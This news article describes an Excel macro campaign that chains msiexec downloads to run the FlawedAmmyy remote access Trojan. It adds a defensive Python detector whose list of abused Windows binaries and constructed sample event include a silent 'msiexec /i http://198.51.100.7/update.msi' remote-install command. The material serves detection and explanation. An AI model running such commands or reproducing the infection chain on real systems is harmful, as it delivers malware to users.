Office applications have long been a favourite way for cybercriminals to attack Windows PCs, and they are being abused yet again. New reports describe a malware campaign spread through Excel attachments in email, driven by a macro. A macro is an action, or a set of actions, that can be run as many times as you want; in Excel it is found under the 'Developer' tab. Surprisingly, even a fully patched Windows PC can be at risk, because the attack abuses a legitimate feature rather than a software vulnerability.
The attack starts with an email carrying an .xls attachment whose content is in Korean. When a user opens the file and its macro runs, the macro launches msiexec.exe, which in turn downloads an MSI archive. "The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory. This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy," explains Microsoft Security Intelligence. The company is already fighting this Windows malware and advises users not to enable macros.
Anomaly detection helped Microsoft uncover this new campaign, which employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. Because the lure email and .xls attachment are written in Korean, the campaign appears to have been aimed primarily at Korean users.
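The chain above (Excel spawns msiexec.exe with a remote MSI, which then drops and runs executables from a user-writable path) is exactly the kind of parent/child relationship that endpoint telemetry makes visible. The following is an added example, not code from Microsoft or from the article: a small detection routine run over constructed process-creation events in a Sysmon-like shape. The process names, paths, PIDs and the 198.51.100.7 address are invented sample data. It generalizes slightly beyond this campaign by also flagging other script and installer binaries (mshta, wscript, PowerShell, regsvr32, rundll32) spawned under an Office process.

```python
"""Flag Office-launched installer/script binaries and Office-descended
executables running from user-writable paths.

The process events at the bottom are CONSTRUCTED samples, not real
telemetry; their paths, PIDs and the 198.51.100.7 address are invented.
"""
import re
from dataclasses import dataclass

# Office hosts that should almost never spawn installers or script engines.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Living-off-the-land binaries a malicious macro typically reaches for.
LOLBINS = {"msiexec.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the newly created process
    cmdline: str    # its command line


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(event, by_pid, max_depth=8):
    """Walk up the parent chain; return the nearest Office ancestor or None."""
    cur = by_pid.get(event.ppid)
    depth = 0
    while cur is not None and depth < max_depth:
        if basename(cur.image) in OFFICE_HOSTS:
            return cur
        cur = by_pid.get(cur.ppid)
        depth += 1
    return None


def analyze(events):
    """Return a list of alert dicts for suspicious Office-descended processes."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        anc = office_ancestor(e, by_pid)
        if anc is None:
            continue                      # no Office process in the ancestry
        child = basename(e.image)
        if child in LOLBINS:
            rule = "office-spawns-lolbin"
            # First hop of the chain described in the article: msiexec pulling
            # an MSI from a URL on behalf of an Excel macro.
            if child == "msiexec.exe" and URL_RE.search(e.cmdline):
                rule = "office-msiexec-remote-msi"
            alerts.append({"pid": e.pid, "rule": rule,
                           "ancestor": basename(anc.image), "cmdline": e.cmdline})
        elif USER_WRITABLE_RE.search(e.image):
            # Later hops: dropped executables launched from Temp/AppData.
            alerts.append({"pid": e.pid, "rule": "office-descendant-from-user-writable-path",
                           "ancestor": basename(anc.image), "cmdline": e.cmdline})
    return alerts


# Constructed sample events (hypothetical paths, PIDs and URL).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"EXCEL.EXE" "C:\Users\alice\Downloads\invoice.xls"'),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://198.51.100.7/update.msi /q"),
    ProcEvent(400, 300, r"C:\Users\alice\AppData\Local\Temp\MSI8F3A.tmp",
              r"C:\Users\alice\AppData\Local\Temp\MSI8F3A.tmp"),
    # Benign: a user double-clicking a local MSI from Explorer.
    ProcEvent(500, 100, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi"),
    # Benign: Office child that is neither a LOLBin nor in a user-writable path.
    ProcEvent(600, 200, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

On the sample data only PIDs 300 and 400 are flagged; the Explorer-launched local install and the Office-spawned Notepad are left alone. In production the same ancestry walk would be run against Sysmon event ID 1 or EDR process-start records, and the URL check should be paired with the msiexec command-line logging those sources already provide.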
Explaining this new malware attack, Satyajit Sinha, Research Analyst with Counterpoint Research, who covers IoT, mobility, cyber-security and the smart-device ecosystem, says, "This malware is known as Macro Malware, and it's not new. First discovered in July 1995, it is making its comeback through phishing emails. It is spreading through an e-mail requesting users to open the attachment. However, this time, the malware doesn't require the user to enable macros. It runs a macro automatically when a user opens the attached Excel/Word file. As this malware is not targeting any specific exploits in the system, even fully patched PCs/devices can be its target."
Sinha suggests consumers stay safe by applying spam and junk filters and by not opening any attachment without first confirming who the sender is.
Microsoft, for its part, says that its Threat Protection defends customers from this attack: "Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign."
Security firm Proofpoint attributes the campaign to a group called TA505, which has been responsible for similar attacks in the past.